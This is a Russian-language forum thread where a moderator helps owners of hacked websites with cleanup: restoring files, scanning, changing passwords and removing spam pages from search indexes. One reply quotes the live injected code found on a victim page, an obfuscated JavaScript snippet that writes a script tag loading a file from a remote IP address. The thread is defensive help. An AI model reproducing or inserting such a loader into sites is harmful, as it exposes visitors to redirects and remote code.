Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
К сожалению САППОРТ не может мне предоставить доступ к админ панели, мотивируя тем, что он заражен вирусом.
Я Вам больше скажу, он в принципе не должен был этого делать. Судя по картинкам, у Вас етсь доступ до Панели управления хостингом и доя Управлением БД. В интернете есть инструкции как восстановить доступ к WP через БД,
 
Через панель своего хостинга wp-content/plugins/ я отключил все плагины (_29 шт) сайта хттп://dohodnoemecto.r путем их переименования.
Сайт по-прежнему не открывается и показывает тот код, который я показывал в своем сообщении от
26 Июн 2018
Список применяемых плагинов на сайте прилагаю
 
Последнее редактирование модератором:
Для начало можно сделать резервную копию сайта, полный бэкап всех файлов и БД сохранить. Дальше восстановить резервную копию если такова имеется на момент работоспособности сайта.
После чего сменить пароли от хостинга и фтп возможно БД.

Когда копию восстановить сайт запустить, зайти в панель управления сайтом отключить или удалить плагины. Провести аудит безопасности сайта.

Так же рекомендую все таки нанять специалиста.
 
@raveal-2, вам там прямым тектом пишет, что ошибка из-за файла admin-header.php

и список плагинов лучше удалите из своего поста.
 
Последнее редактирование модератором:
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл admin-header.php, на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
 
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
Привет АКОК!
Я сделал бэкап, подготовил чистый архив и вставил чистый файл admin-header.php , переименовал старый файл
dmin-header.php

Теперь, если позволите, пару вопросов дилетанта:
-Мне теперь, для того чтобы проверить работу сайта опять нужно закачать на хостинг этот бэкап с чистым файлом?
-Если "да", то как это сделать? Нужно ли предварительно использовать сканер Ai-Bolit?
-Как проверить наличие левых пользователей?
Спасибо
 
После подготовки резервной копии, нужно было менять файл на самом хостинге, а не в бекапе. Бекап на случай "все пропало". Если сайт запустится, то воспользуйтесь Ai-Bolit, если нет. То тут только переустановка. Не забывайте о бекапе.
 
Здравствуйте.
Avast информирует о зараженной индексной странице сайта х ттр://dohodtut.ru
На остальные страницы сайта Avast не реагирует.
Например - х ттр://dohodtut.ru/index.html или х ттр://dohodtut.ru/MLM_v_%202raza.html
Как данный вирус удалить? Спасибо за ответ
 

Вложения

  •  1.webp
    1.webp
    19.6 KB · Просмотры: 130
1. Главная сейчас ничего не отдает, белая страница

2. С dohodtut.ru/index.htm был редирект на start.parimatch.com

В коде
HTML:
<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script>

Описание WordPress Hacks: jQuery JS script injection :: Cybersecurity blog :: www.polaris64.net
 
@akok, Редирект можно как-то удалить?
Теперь и х ттр:// dohodtut.ru/index.htm ничего не отдает, белая страница...
Как исправить? Поможет ли предоставление кода главной страницы?
 
Редирект можно как-то удалить?
отредактировать страницу и убрать вставку в моем предыдущем посте.

С белой страницей, смотрите в настройки хостинга/скрипта или наймите администратора на часок.
и/или закажите лечение на стороннем сервисе (например: Вылечить сайт от вирусов.)
 
Здравствуйте!
Помогите, пожалуйста, с сайтом хттп://belmetall.by
В search console индексируются тысячи страниц, сгенерированных явно вирусом.
site: выдает чего-то с японскими иероглифами... Восстановил бэкап, удалил ненужные расширения, но ситуация с индексацией не поменялась.
Что можно сделать, помогите!!!
 
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии

После заказать удаление каталогов (они выдают сейчас 404 ошибку)

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
 
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии
После заказать удаление каталогов (они выдают сейчас 404 ошибку)

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
Спасибо большое за ответ!
Конечно же, 1,2 были сделаны.
Меня беспокоит то, что всё это проделано уже 2 недели назад, а страницы эти по прежнему в индексе, меньше не становиться.
Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Удалять страницы гугловским инструментом наверное не реально, их же тысячи, как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Не могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?
Спасибо заранее!
 
уже 2 недели назад
Удаление будет только тогда когда бот их заново проиндексирует, а это занимает месяца.

Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Сейчас признаков взлома нет, отслеживайте метрики в консоли, если количество спам-страниц будет расти, то значит не все обновили.



е могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?

Если конечно используете Apache
как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Раньше можно было удалять каталоги, но смотрю форму поменяли.

О Yandex вебматере не забывайте.
 
Назад
Сверху Снизу